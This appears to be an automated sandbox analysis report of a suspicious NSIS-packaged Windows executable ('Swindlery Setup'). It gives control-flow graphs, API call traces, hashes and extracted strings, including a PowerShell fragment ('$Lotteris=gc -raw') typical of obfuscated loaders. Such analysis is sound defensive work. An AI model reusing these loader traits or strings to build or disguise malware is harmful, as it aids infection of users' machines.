                          control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 7 403490 5->7 8 40347f-40348e 5->8 9 4034a5-4034e5 6->9 10 40349d 6->10 7->6 8->6 11 4034e7-4034ef call 4066b5 9->11 12 4034f8 9->12 10->9 11->12 18 4034f1 11->18 14 4034fd-403511 call 406647 lstrlenA 12->14 19 403513-40352f call 4066b5 * 3 14->19 18->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 32 403539 27->32 32->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 53 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->53 54 40370f-403727 DeleteFileA call 402f31 43->54 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 66 40367e 47->66 51 403601-40362e 48->51 52 4035eb-4035f1 48->52 55 403640-40366e 51->55 56 403630-403636 51->56 60 4035f3-4035f5 52->60 61 4035f7 52->61 53->54 68 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 53->68 69 4037ba-4037cb ExitProcess CoUninitialize 54->69 70 40372d-403733 54->70 55->47 65 40368b-403698 call 40628d 55->65 62 403638-40363a 56->62 63 40363c 56->63 60->51 60->61 61->51 62->55 62->63 63->55 65->43 66->38 68->54 68->69 75 4037d1-4037e0 call 4059a3 ExitProcess 69->75 76 403928-40392e 69->76 73 403735-403740 call 405c4a 70->73 74 4037ab-4037b2 call 403a96 70->74 91 403742-40376b 73->91 92 403776-40377f 73->92 85 4037b7 74->85 79 403930-403945 GetCurrentProcess OpenProcessToken 76->79 80 4039a6-4039ae 76->80 86 403976-403984 call 4066b5 79->86 87 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 79->87 83 4039b0 80->83 84 4039b3-4039b6 ExitProcess 80->84 83->84 85->69 99 403992-40399d ExitWindowsEx 86->99 100 403986-403990 86->100 87->86 96 40376d-40376f 91->96 93 403781-40378f call 405d0d 92->93 94 4037e6-40380a call 40590e lstrlenA call 40628d 92->94 93->69 107 403791-4037a7 call 40628d * 2 93->107 111 40381b-403830 94->111 112 40380c-403816 call 40628d 94->112 96->92 101 403771-403774 96->101 99->80 104 40399f-4039a1 call 40140b 99->104 100->99 100->104 101->92 101->96 104->80 107->74 116 403835 111->116 112->111 118 403839-403865 wsprintfA call 406320 116->118 121 403867-40386c call 405897 118->121 122 40386e call 4058f1 118->122 125 403873-403875 121->125 122->125 127 403877-403881 GetFileAttributesA 125->127 128 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 125->128 129 4038a0-4038a8 127->129 130 403883-40388c DeleteFileA 127->130 128->69 136 4038d4-4038f5 call 406066 call 406320 call 405926 128->136 129->116 133 4038aa 129->133 130->129 132 40388e-40389e call 405a4f 130->132 132->118 132->129 133->69 144 4038f7-4038ff 136->144 145 403918-403923 CloseHandle 136->145 144->69 146 403905-40390d call 406620 144->146 145->69 146->118 149 403913 146->149 149->69
                          APIs
                          • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                          • GetVersionExA.KERNEL32(?), ref: 00403424
                          • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                          • OleInitialize.OLE32(00000000), ref: 00403548
                          • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                          • GetCommandLineA.KERNEL32(Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000020,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                          • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                          • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C), ref: 004037BA
                          • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C), ref: 004037BF
                          • ExitProcess.KERNEL32 ref: 004037E0
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                          • wsprintfA.USER32 ref: 00403846
                          • GetFileAttributesA.KERNEL32( for va",C:\Users\user\AppData\Local\Temp\, for va",?,0000000C), ref: 00403878
                          • DeleteFileA.KERNEL32( for va"), ref: 00403884
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\, for va",?,0000000C), ref: 004038B0
                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\vfhlZ0vrbe.exe, for va",00000001), ref: 004038C6
                          • CloseHandle.KERNEL32(00000000,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 00403919
                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                          • ExitProcess.KERNEL32 ref: 004039B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                          • String ID: for va"$"$"$Lotteris=gc -raw '$"C:\Users\user\Desktop\vfhlZ0vrbe.exe"$1033$A$Bry gek$$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene$C:\Users\user\Desktop$C:\Users\user\Desktop\vfhlZ0vrbe.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Swindlery Setup$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                          • API String ID: 3308099279-713549643
                          • Opcode ID: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                          • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                          • Opcode Fuzzy Hash: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                          • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                          Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 150 40550f-40552b 151 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 150->151 152 4056ba-4056c0 150->152 172 405616-405619 151->172 173 4055fa-405614 SendMessageA * 2 151->173 154 4056c2-4056e4 GetDlgItem CreateThread CloseHandle 152->154 155 4056ea-4056f6 152->155 154->155 157 405718-40571e 155->157 158 4056f8-4056fe 155->158 162 405720-405726 157->162 163 405773-405776 157->163 160 405700-405713 ShowWindow * 2 call 404362 158->160 161 405739-405740 call 404394 158->161 160->157 176 405745-405749 161->176 167 405728-405734 call 404306 162->167 168 40574c-40575c ShowWindow 162->168 163->161 165 405778-40577e 163->165 165->161 174 405780-405793 SendMessageA 165->174 167->161 170 40576c-40576e call 404306 168->170 171 40575e-405767 call 4053d1 168->171 170->163 171->170 179 405629-405640 call 40432d 172->179 180 40561b-405627 SendMessageA 172->180 173->172 181 405890-405892 174->181 182 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 174->182 189 405642-405656 ShowWindow 179->189 190 405676-405697 GetDlgItem SendMessageA 179->190 180->179 181->176 187 4057c7-4057d7 GetWindowRect 182->187 188 4057da-4057f0 TrackPopupMenu 182->188 187->188 188->181 192 4057f6-405810 188->192 193 405665 189->193 194 405658-405663 ShowWindow 189->194 190->181 191 40569d-4056b5 SendMessageA * 2 190->191 191->181 195 405815-405830 SendMessageA 192->195 196 40566b-405671 call 404362 193->196 194->196 195->195 197 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 195->197 196->190 199 405854-405874 SendMessageA 197->199 199->199 200 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 199->200 200->181
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 0040556E
                          • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                          • GetClientRect.USER32(?,?), ref: 004055BA
                          • GetSystemMetrics.USER32(00000002), ref: 004055C1
                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                          • ShowWindow.USER32(?,00000008), ref: 0040565D
                          • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                          • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                            • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                          • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                          • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                          • ShowWindow.USER32(00000000), ref: 00405707
                          • ShowWindow.USER32(?,00000008), ref: 0040570E
                          • ShowWindow.USER32(00000008), ref: 00405754
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                          • CreatePopupMenu.USER32 ref: 00405799
                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                          • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                          • OpenClipboard.USER32(00000000), ref: 00405833
                          • EmptyClipboard.USER32 ref: 00405839
                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                          • GlobalLock.KERNEL32(00000000), ref: 0040584C
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                          • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                          • CloseClipboard.USER32 ref: 0040588A
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID:
                          • API String ID: 590372296-0
                          • Opcode ID: 64c451d9d50d9bfa689017f85777d3b3ea4ec6884c029f4fd59a0d01b7806755
                          • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                          • Opcode Fuzzy Hash: 64c451d9d50d9bfa689017f85777d3b3ea4ec6884c029f4fd59a0d01b7806755
                          • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                          Function 00405A4F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 514 405a4f-405a75 call 405d0d 517 405a77-405a89 DeleteFileA 514->517 518 405a8e-405a95 514->518 519 405c18-405c1c 517->519 520 405a97-405a99 518->520 521 405aa8-405ab8 call 40628d 518->521 522 405bc6-405bcb 520->522 523 405a9f-405aa2 520->523 529 405ac7-405ac8 call 405c66 521->529 530 405aba-405ac5 lstrcatA 521->530 522->519 525 405bcd-405bd0 522->525 523->521 523->522 527 405bd2-405bd8 525->527 528 405bda-405be2 call 406620 525->528 527->519 528->519 538 405be4-405bf8 call 405c1f call 405a07 528->538 531 405acd-405ad0 529->531 530->531 534 405ad2-405ad9 531->534 535 405adb-405ae1 lstrcatA 531->535 534->535 537 405ae6-405b04 lstrlenA FindFirstFileA 534->537 535->537 539 405b0a-405b21 call 405c4a 537->539 540 405bbc-405bc0 537->540 550 405c10-405c13 call 4053d1 538->550 551 405bfa-405bfd 538->551 548 405b23-405b27 539->548 549 405b2c-405b2f 539->549 540->522 542 405bc2 540->542 542->522 548->549 552 405b29 548->552 553 405b31-405b36 549->553 554 405b42-405b50 call 40628d 549->554 550->519 551->527 556 405bff-405c0e call 4053d1 call 406066 551->556 552->549 558 405b38-405b3a 553->558 559 405b9b-405bad FindNextFileA 553->559 564 405b52-405b5a 554->564 565 405b67-405b72 call 405a07 554->565 556->519 558->554 563 405b3c-405b40 558->563 559->539 562 405bb3-405bb6 FindClose 559->562 562->540 563->554 563->559 564->559 567 405b5c-405b65 call 405a4f 564->567 574 405b93-405b96 call 4053d1 565->574 575 405b74-405b77 565->575 567->559 574->559 577 405b79-405b89 call 4053d1 call 406066 575->577 578 405b8b-405b91 575->578 577->559 578->559
                          APIs
                          • DeleteFileA.KERNELBASE(?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405A78
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AC0
                          • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AE1
                          • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AE7
                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*,?,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405AF8
                          • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                          • FindClose.KERNEL32(00000000), ref: 00405BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\*.*$\*.*
                          • API String ID: 2035342205-3221713239
                          • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                          • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                          • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                          • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                          Function 00406620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNELBASE(77193410,0042BCD8,C:\,00405D50,C:\,C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                          • FindClose.KERNEL32(00000000), ref: 00406637
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\
                          • API String ID: 2295610775-3404278061
                          • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                          • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                          • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                          • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC
                          Function 00403E33 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 201 403e33-403e45 202 403e4b-403e51 201->202 203 403fac-403fbb 201->203 202->203 204 403e57-403e60 202->204 205 40400a-40401f 203->205 206 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 203->206 209 403e62-403e6f SetWindowPos 204->209 210 403e75-403e7c 204->210 207 404021-404024 205->207 208 40405f-404064 call 404379 205->208 206->205 212 404026-404031 call 401389 207->212 213 404057-404059 207->213 220 404069-404084 208->220 209->210 215 403ec0-403ec6 210->215 216 403e7e-403e98 ShowWindow 210->216 212->213 237 404033-404052 SendMessageA 212->237 213->208 219 4042fa 213->219 223 403ec8-403eda DestroyWindow 215->223 224 403edf-403ee2 215->224 221 403f99-403fa7 call 404394 216->221 222 403e9e-403eb1 GetWindowLongA 216->222 231 4042fc-404303 219->231 228 404086-404088 call 40140b 220->228 229 40408d-404093 220->229 221->231 222->221 230 403eb7-403eba ShowWindow 222->230 232 4042d7-4042dd 223->232 234 403ee4-403ef0 SetWindowLongA 224->234 235 403ef5-403efb 224->235 228->229 241 4042b8-4042d1 DestroyWindow KiUserCallbackDispatcher 229->241 242 404099-4040a4 229->242 230->215 232->219 240 4042df-4042e5 232->240 234->231 235->221 236 403f01-403f10 GetDlgItem 235->236 243 403f12-403f29 SendMessageA IsWindowEnabled 236->243 244 403f2f-403f32 236->244 237->231 240->219 245 4042e7-4042f0 ShowWindow 240->245 241->232 242->241 246 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 242->246 243->219 243->244 247 403f34-403f35 244->247 248 403f37-403f3a 244->248 245->219 273 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 246->273 274 4040f9-4040fe 246->274 250 403f65-403f6a call 404306 247->250 251 403f48-403f4d 248->251 252 403f3c-403f42 248->252 250->221 255 403f83-403f93 SendMessageA 251->255 257 403f4f-403f55 251->257 252->255 256 403f44-403f46 252->256 255->221 256->250 261 403f57-403f5d call 40140b 257->261 262 403f6c-403f75 call 40140b 257->262 271 403f63 261->271 262->221 270 403f77-403f81 262->270 270->271 271->250 277 404142 273->277 278 40413f-404140 273->278 274->273 279 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 277->279 278->279 280 404174-404185 SendMessageA 279->280 281 404187 279->281 282 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 280->282 281->282 282->220 293 4041cd-4041cf 282->293 293->220 294 4041d5-4041d9 293->294 295 4041f8-40420c DestroyWindow 294->295 296 4041db-4041e1 294->296 295->232 297 404212-40423f CreateDialogParamA 295->297 296->219 298 4041e7-4041ed 296->298 297->232 299 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 297->299 298->220 300 4041f3 298->300 299->219 305 40429e-4042b1 ShowWindow call 404379 299->305 300->219 307 4042b6 305->307 307->232
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                          • ShowWindow.USER32(?), ref: 00403E8F
                          • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                          • ShowWindow.USER32(?,00000004), ref: 00403EBA
                          • DestroyWindow.USER32 ref: 00403ECE
                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                          • GetDlgItem.USER32(?,?), ref: 00403F06
                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                          • IsWindowEnabled.USER32(00000000), ref: 00403F21
                          • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                          • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                          • GetDlgItem.USER32(?,00000003), ref: 004040E7
                          • ShowWindow.USER32(00000000,?), ref: 00404108
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                          • EnableWindow.USER32(?,?), ref: 00404135
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                          • EnableMenuItem.USER32(00000000), ref: 00404152
                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                          • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                          • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                          • ShowWindow.USER32(?,0000000A), ref: 004042EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID:
                          • API String ID: 121052019-0
                          • Opcode ID: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                          • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                          • Opcode Fuzzy Hash: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                          • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                          Function 00403A96 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
